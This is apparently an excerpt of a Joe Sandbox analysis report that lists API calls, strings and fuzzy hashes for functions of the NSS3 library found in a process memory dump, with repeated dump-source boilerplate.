PR_Unlock.NSS3 ref: 6D528E2D
PR_SetError.NSS3 ref: 6D528E49

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: e71db6d64c93eb9432b978cd120c0dfc04ade2f62fc960cbdb6af8d04961a890
Instruction ID: f2f47fa53667139a43da2289aff53c249f966071b13e91f04106120be46929b9
Opcode Fuzzy Hash: e71db6d64c93eb9432b978cd120c0dfc04ade2f62fc960cbdb6af8d04961a890
Instruction Fuzzy Hash: 1311E075908A118FC704AF79C48826ABBF0FF45310F064929DD88C7B00EB34E898CBC2

Function 6D5AAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6D595F17,?,?,?,?,?,?,?,?,6D59AAD4), ref: 6D5AAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6D595F17,?,?,?,?,?,?,?,?,6D59AAD4), ref: 6D5AACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6D59AAD4), ref: 6D5AACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6D59AAD4), ref: 6D5AACDB

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: df159327123f4263d76604df761336bcff17fc31684fdf278cfbd526713347f4
Instruction ID: d87d9fdb8ea4f1a13b5b2b589a90e2e213674503883dfffe9af9276b013ae5bc
Opcode Fuzzy Hash: df159327123f4263d76604df761336bcff17fc31684fdf278cfbd526713347f4
Instruction Fuzzy Hash: 3A015EB1600B129BE750DF2AD908B27BBE8BF44755B054839E85AC3E10E732F455CB91

Function 6D511DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6D511DFB

Part of subcall function 6D5095B0: TlsGetValue.KERNEL32(00000000,?,6D5200D2,00000000), ref: 6D5095D2
Part of subcall function 6D5095B0: EnterCriticalSection.KERNEL32(?,?,?,6D5200D2,00000000), ref: 6D5095E7
Part of subcall function 6D5095B0: PR_Unlock.NSS3(?,?,?,?,6D5200D2,00000000), ref: 6D509605

PR_EnterMonitor.NSS3 ref: 6D511E09

Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C90AB
Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C90C9
Part of subcall function 6D5C9090: EnterCriticalSection.KERNEL32 ref: 6D5C90E5
Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C9116
Part of subcall function 6D5C9090: LeaveCriticalSection.KERNEL32 ref: 6D5C913F

Part of subcall function 6D50E190: PR_EnterMonitor.NSS3(?,?,6D50E175), ref: 6D50E19C
Part of subcall function 6D50E190: PR_EnterMonitor.NSS3(6D50E175), ref: 6D50E1AA
Part of subcall function 6D50E190: PR_ExitMonitor.NSS3 ref: 6D50E208
Part of subcall function 6D50E190: PL_HashTableRemove.NSS3(?), ref: 6D50E219
Part of subcall function 6D50E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D50E231
Part of subcall function 6D50E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D50E249
Part of subcall function 6D50E190: PR_ExitMonitor.NSS3 ref: 6D50E257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D511E37
PR_ExitMonitor.NSS3 ref: 6D511E4A

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: a765aab70c240e2c97841f3b80781675e4aee972d7b6c8a79464f22ee07e5c63
Instruction ID: 6638f4545b0aaca8019abe16c6c1eabb43037b6ec0da27a71afa3de883de291f
Opcode Fuzzy Hash: a765aab70c240e2c97841f3b80781675e4aee972d7b6c8a79464f22ee07e5c63
Instruction Fuzzy Hash: 99012B75A5815197FB048BA7EC00F267F64BBA1748F054675E5189BA90F731EC10CBD2

Function 6D511D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D511D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6D511D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6D511D9C
free.MOZGLUE(00000000), ref: 6D511DB8

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: bb98638605d1ea4145ce8b3e327bef721d3cbea95244ca007e059938dbe228b8
Instruction ID: 943585c45ea9a8b83c156e4f43b0b637d91e7f818c2289e698e3141419649356
Opcode Fuzzy Hash: bb98638605d1ea4145ce8b3e327bef721d3cbea95244ca007e059938dbe228b8
Instruction Fuzzy Hash: C1F0F9B2E0861157F7145F5A6C41F573658AFA1794F064AB6EE1947A40DB71A800C2E2

Function 6D590840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6D662F88,6D590660,00000020,00000000,?,?,6D592C3D,?,00000000,00000000,?,6D592A28,00000060,00000001), ref: 6D590860

Part of subcall function 6D484C70: TlsGetValue.KERNEL32(?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484C97
Part of subcall function 6D484C70: EnterCriticalSection.KERNEL32(?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484CB0
Part of subcall function 6D484C70: PR_Unlock.NSS3(?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6D592C3D,?,00000000,00000000,?,6D592A28,00000060,00000001), ref: 6D590874
EnterCriticalSection.KERNEL32(00000001), ref: 6D590884
PR_Unlock.NSS3 ref: 6D5908A3

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: 632e19fcef837721654c1fd2747357cbab04baf6bcf61c2ded735ed27f416258
Instruction ID: d35f4dcf52525d14c96093695e036c35545ed673707f811047d2caa52e5b9e20
Opcode Fuzzy Hash: 632e19fcef837721654c1fd2747357cbab04baf6bcf61c2ded735ed27f416258
Instruction Fuzzy Hash: F0017B36D04281ABEB056F3FDC01B35773CEB9A318F050967ED1C5A502E731989087E2

Function 6D55FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6D509003,?), ref: 6D55FD91

Part of subcall function 6D560BE0: malloc.MOZGLUE(6D558D2D,?,00000000,?), ref: 6D560BF8
Part of subcall function 6D560BE0: TlsGetValue.KERNEL32(6D558D2D,?,00000000,?), ref: 6D560C15

PORT_Alloc_Util.NSS3(A4686D56,?), ref: 6D55FDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686D56,?,?), ref: 6D55FDC4
free.MOZGLUE(00000000,?,?), ref: 6D55FDD1

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: 9a65d7a80f5c4b3d0f1a2ec960bd8a1a203fdc601588327b00897962cb380eea
Instruction ID: 5f91c27b5ea55133cf0244c1a4997c4c9739da8255cdcb7076af4f598251126c
Opcode Fuzzy Hash: 9a65d7a80f5c4b3d0f1a2ec960bd8a1a203fdc601588327b00897962cb380eea
Instruction Fuzzy Hash: 06F0C8F16042039BEB054B59DC809277758EF94295B058136ED09CBA12E721D820C7E1

Function 6D61CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6D61CC61
free.MOZGLUE ref: 6D61CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6D61CC80
free.MOZGLUE(?), ref: 6D61CC87

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 46eee13305181a2e4249a3567ea0934a7730904af2ae0875e06e85f5e7d249ee
Instruction ID: 62d5f222d6ff0e114b92e5e18408f18b1c3ffb818037d9e99657f3ddbc2c89af
Opcode Fuzzy Hash: 46eee13305181a2e4249a3567ea0934a7730904af2ae0875e06e85f5e7d249ee
Instruction Fuzzy Hash: 18E030766006099BCF10DFA9DC44C8677ACEE492707160525E692C3700D332F955CBA1

Function 6D4F9DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6D4F9E1F

Part of subcall function 6D4B13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6D482352,?,00000000,?,?), ref: 6D4B1413
Part of subcall function 6D4B13C0: memcpy.VCRUNTIME140(00000000,R#Hm,00000002,?,?,?,?,6D482352,?,00000000,?,?), ref: 6D4B14C0

Strings

LIKE or GLOB pattern too complex, xrefs: 6D4FA006
ESCAPE expression must be a single character, xrefs: 6D4F9F78

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: ab55b09b5e06f268f6171737a3d834d0566bcc38843c31c5b5718210b4c7dc86
Instruction ID: 0b8baf456a167f5aad8eb9e32f462bf2ff5b195fc530154d700a8898fecddaf1
Opcode Fuzzy Hash: ab55b09b5e06f268f6171737a3d834d0566bcc38843c31c5b5718210b4c7dc86
Instruction Fuzzy Hash: C581D371A042564BDB04CE28C480BBEB7B2AFC5324F258659D8A88B3E5D737DD87C791

Function 6D554D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6D554D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6D554DE6

Strings

%d.%d, xrefs: 6D554DDE

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 3f7e55ced834f9314accbe2cfe21559d8f2a3ec1d4a13fc24a5df48199b12e71
Instruction ID: de83d7591ed87558fa719970b24ec56a363e25db76f138f5dbf880a9e2f3987c
Opcode Fuzzy Hash: 3f7e55ced834f9314accbe2cfe21559d8f2a3ec1d4a13fc24a5df48199b12e71
Instruction Fuzzy Hash: 68312EB1D042196BEB159FA59C05FBF7768EF84304F05046AED0597681EB309D25CBE2

Function 6D5F0900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?), ref: 6D5F0917
sqlite3_value_text.NSS3(?), ref: 6D5F0923

Part of subcall function 6D4B13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6D482352,?,00000000,?,?), ref: 6D4B1413
Part of subcall function 6D4B13C0: memcpy.VCRUNTIME140(00000000,R#Hm,00000002,?,?,?,?,6D482352,?,00000000,?,?), ref: 6D4B14C0

Strings

error in %s %s%s%s: %s, xrefs: 6D5F0944

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_value_text$memcpystrlen
String ID: error in %s %s%s%s: %s
API String ID: 1937290486-1007276823
Opcode ID: 9eac9920f1c1be125f4380299d8e9e8bbf385374573e903cf8a00d6a5f718c45
Instruction ID: 87a24508119c15fb66f9ab802e18767bb920d3d4033a0ed7598a4dde0e0bb84f
Opcode Fuzzy Hash: 9eac9920f1c1be125f4380299d8e9e8bbf385374573e903cf8a00d6a5f718c45
Instruction Fuzzy Hash: D00125B6D041045FEB009E58EC01A7FB7B5EFC4208F044029EE485B312FB32AD2087E2

Function 6D574CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8Wm,00000000,00000000,?,?,6D573827,?,00000000), ref: 6D574D0A

Part of subcall function 6D560840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D5608B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6D574D22

Part of subcall function 6D55FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6D501A3E,00000048,00000054), ref: 6D55FD56

Strings

'8Wm, xrefs: 6D574D07

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8Wm
API String ID: 1521942269-4028639941
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 7fa26e777b79ab61a4761795d5da84c68c0271504ad1ce96cfa3465de86b2cb6
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: 58F09632600226A7EB754D6EAC80B1336DC9B49679F250671ED68CF791E631CC00C6E1

Function 6D59AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6D59AF78

Part of subcall function 6D4FACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D4FACE2
Part of subcall function 6D4FACC0: malloc.MOZGLUE(00000001), ref: 6D4FACEC
Part of subcall function 6D4FACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6D4FAD02
Part of subcall function 6D4FACC0: TlsGetValue.KERNEL32 ref: 6D4FAD3C
Part of subcall function 6D4FACC0: calloc.MOZGLUE(00000001,?), ref: 6D4FAD8C
Part of subcall function 6D4FACC0: PR_Unlock.NSS3 ref: 6D4FADC0
Part of subcall function 6D4FACC0: PR_Unlock.NSS3 ref: 6D4FAE8C
Part of subcall function 6D4FACC0: free.MOZGLUE(?), ref: 6D4FAEAB

memcpy.VCRUNTIME140(6D663084,6D6602AC,00000090), ref: 6D59AF94

Strings

SSL, xrefs: 6D59AF73

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: e19632a347fde4b097796bb02436678a6fec188396b8600106eff8c46fa4f048
Instruction ID: 34ca01ab5ee14579e142a86341be99f1f418aef6f51e6a8a9fcaacf6fdd20968
Opcode Fuzzy Hash: e19632a347fde4b097796bb02436678a6fec188396b8600106eff8c46fa4f048
Instruction Fuzzy Hash: CA212CB05092C8ABEF08DF53E98B73A7AF6B302A08B585118D5194FB45D731445CAFD7

Function 6D50C810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]Pm,6D506499,-00000078,00000000,?,?,]Pm,?,6D505DEF,?), ref: 6D50C821

Part of subcall function 6D501DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D501E0B
Part of subcall function 6D501DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6D501E24

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]Pm,?,6D505DEF,?,?,?), ref: 6D50C857

Strings

]Pm, xrefs: 6D50C810

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
String ID: ]Pm
API String ID: 221937774-3330538532
Opcode ID: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction ID: 61cc652a11b174ac259c09785ab3fa34836a4b0d2b01fc72164c5b65de264341
Opcode Fuzzy Hash: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction Fuzzy Hash: 5AF08CB7A0411967FF065965AC05ABA36599FC2299F050431FF08D6641FB22CD2183F6

Function 6D4F0F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6D4F0936,FFFFE8AE,?,6D4816B7,00000000,?,6D4F0936,00000000,?,6D48204A), ref: 6D4F0F1B

Part of subcall function 6D4F1370: GetSystemInfo.KERNEL32(?,?,?,?,6D4F0936,?,6D4F0F20,6D4F0936,FFFFE8AE,?,6D4816B7,00000000,?,6D4F0936,00000000), ref: 6D4F138F

PR_NewLogModule.NSS3(clock,6D4F0936,FFFFE8AE,?,6D4816B7,00000000,?,6D4F0936,00000000,?,6D48204A), ref: 6D4F0F25

Part of subcall function 6D4F1110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6D4F0936,00000001,00000040), ref: 6D4F1130
Part of subcall function 6D4F1110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6D4F0936,00000001,00000040), ref: 6D4F1142
Part of subcall function 6D4F1110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6D4F0936,00000001), ref: 6D4F1167

Strings

clock, xrefs: 6D4F0F20

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 60b0fcdea2eba916c74659c787eb20ee2564e6f9d8e3bc88a180b3efc8574328
Instruction ID: a8a13a6bc2fd34668607c4fd287c1e8a2edb3fc0e4dd2a79c1a2de23c523d360
Opcode Fuzzy Hash: 60b0fcdea2eba916c74659c787eb20ee2564e6f9d8e3bc88a180b3efc8574328
Instruction Fuzzy Hash: CDD0227140819497C32092579C40F36B2ACC7DB2B5F12042AE208424200B2508D7C2E6

Function 6D560DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6D560DF5
TlsGetValue.KERNEL32 ref: 6D560E2D
TlsGetValue.KERNEL32 ref: 6D560E58
